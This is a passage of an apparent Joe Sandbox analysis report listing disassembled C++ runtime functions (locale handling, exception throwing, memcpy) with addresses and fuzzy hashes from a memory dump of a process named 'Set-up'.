                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: 084cb01a92c54233d4c9d8fe3205562ae7173b7d15965b8f43b7c5c8170682ee
                                                                                              • Instruction ID: 01e353e0a3aabbd0b30c668c10f71f9af1d9e57a75973244fca112bd93c9781d
                                                                                              • Opcode Fuzzy Hash: 084cb01a92c54233d4c9d8fe3205562ae7173b7d15965b8f43b7c5c8170682ee
                                                                                              • Instruction Fuzzy Hash: BDF0E575925208DFD710DFA4C51278CB7F06F50715F10841DA045A7240FB7C5B45CBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1CA71
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC1CA93
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ctype.LIBCPMT(?,00000028), ref: 6BC1CA9E
                                                                                                • Part of subcall function 6BC1CB97: _Getctype.MSVCP100(?,00000000,00000000,?), ref: 6BC1CBA8
                                                                                                • Part of subcall function 6BC1CB97: _Getcvt.MSVCP100(00000000,00000000,?), ref: 6BC1CBB7
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC1CAA6
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetctypeGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@ctypestd::_
                                                                                              • String ID:
                                                                                              • API String ID: 843327012-0
                                                                                              • Opcode ID: ac725052715e4f65608edf4e53c7209f3520b1be5abeacd3e458f7a84acf5075
                                                                                              • Instruction ID: d447b90e483f742c5fc4acacf0613ab465cc1f87be6c95ec034e1a8148d45234
                                                                                              • Opcode Fuzzy Hash: ac725052715e4f65608edf4e53c7209f3520b1be5abeacd3e458f7a84acf5075
                                                                                              • Instruction Fuzzy Hash: 0DE09A78926218DBC714DFA4D552ACCBAB0AF54644F50842DB045BB240FB7C5B45DBA4
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BF41
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC1BF63
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC1BF68
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC1BF76
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 6a4e815f421f65cca5f91920e0a9a1e1f57fb20d72006ddb73a0a4d31c302a55
                                                                                              • Instruction ID: 5cf95b79a1bda13f43e6f4426b5ca525a623b88a6d128989a30aba755301c7a2
                                                                                              • Opcode Fuzzy Hash: 6a4e815f421f65cca5f91920e0a9a1e1f57fb20d72006ddb73a0a4d31c302a55
                                                                                              • Instruction Fuzzy Hash: C5E06578825215CBC724DFB4C15268CBAF0AF54714F50C82EA099AB740EB7C9B40DF60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BD16
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC1BD38
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC1BD3D
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC1BD4B
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 20f89219d01209c1deac6855acb1c386a44fc6b47c25318051fab935ca7ee5eb
                                                                                              • Instruction ID: 45f9629dd71ecedaec8de7dfd475657f07057e370d4b3a80597dda1c4662f519
                                                                                              • Opcode Fuzzy Hash: 20f89219d01209c1deac6855acb1c386a44fc6b47c25318051fab935ca7ee5eb
                                                                                              • Instruction Fuzzy Hash: 0BE06578825214CBC724DFB4C14268CBAF0AF54754F50C82EA099AB340EB7C9B40DF60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC253A4
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC253C6
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC253CB
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC253D9
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 04a4ff5c2db65b1174652bd93ae68b0df6c929c73c575d03b02590b57f2d9740
                                                                                              • Instruction ID: 58102fbceb2ad1af94c98a4088b2fd78aca13267f093bb978bad745b2b026c83
                                                                                              • Opcode Fuzzy Hash: 04a4ff5c2db65b1174652bd93ae68b0df6c929c73c575d03b02590b57f2d9740
                                                                                              • Instruction Fuzzy Hash: ADE032B88252148BC724DFA4C14268CBAF0AF54615F50C82EA099AB240EB7C9B40DF60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC252C5
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC252E7
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC252EC
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC252FA
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 1792ba7a9ee69efbf5940647a1bfb71af81b7065c855267b26c4dbbcd4f12a57
                                                                                              • Instruction ID: cd7d2a814becfed789c5f311b8369aa5db0e8268c3f8eab8ab743347d61cdf0c
                                                                                              • Opcode Fuzzy Hash: 1792ba7a9ee69efbf5940647a1bfb71af81b7065c855267b26c4dbbcd4f12a57
                                                                                              • Instruction Fuzzy Hash: 35E06D78925614CBC714DF74C14268CBAF0AF54714F50C81EA099A7340EB7C9B40DF60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2517B
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC2519D
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC251A2
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC251B0
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 8901376cf1af67e06f03cb4ca5bb38408a2616ae969742a2ef0ea62bbf7ddfda
                                                                                              • Instruction ID: 9b5ee28eddb7940ba4bc6464ecb40bb800179e05e334c39b1f367897178d8a20
                                                                                              • Opcode Fuzzy Hash: 8901376cf1af67e06f03cb4ca5bb38408a2616ae969742a2ef0ea62bbf7ddfda
                                                                                              • Instruction Fuzzy Hash: FAE06578926214CBC724DFB4C14268CBAF0AF54754F50C82EA09AAB340EB7C9B40DF60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2509C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC250BE
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC250C3
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC250D1
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __iob_func$fputcfputs
                                                                                              • String ID:
                                                                                              • API String ID: 1052049658-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_fwrite
                                                                                              • String ID:
                                                                                              • API String ID: 4175271702-3916222277
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position), ref: 6BC309E2
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                                • Part of subcall function 6BC2A795: ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long), ref: 6BC2A7AB
                                                                                              • memcpy.MSVCR100(?,?,?), ref: 6BC30A3D
                                                                                              Strings
                                                                                              • invalid string position, xrefs: 6BC309DD
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                              • String ID: invalid string position
                                                                                              • API String ID: 3077978391-1799206989
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position,?,?,?,?,6BC30924,?,?,?,?,?,?,?,6BC31AA1,?,00000000), ref: 6BC30870
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                                • Part of subcall function 6BC217B0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long,?,?,6BC30934,?,00000000,?,?,?,?,?,6BC31AA1,?,00000000,00000000), ref: 6BC217C3
                                                                                              • memcpy.MSVCR100(?,?,00000000,00000000,00000000,?,?,?,?,6BC30924,?,?,?,?,?,?), ref: 6BC308CB
                                                                                              Strings
                                                                                              • invalid string position, xrefs: 6BC3086B
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                              • String ID: invalid string position
                                                                                              • API String ID: 3077978391-1799206989
                                                                                              APIs
                                                                                              • ??0invalid_link_target@Concurrency@@QAE@PBD@Z.MSVCR100(_Link), ref: 6BC18F9F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8B8), ref: 6BC18FAE
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_link_target@Concurrency@@ExceptionThrow
                                                                                              • String ID: _Link
                                                                                              • API String ID: 3916662256-3418048212
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position), ref: 6BC25E47
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
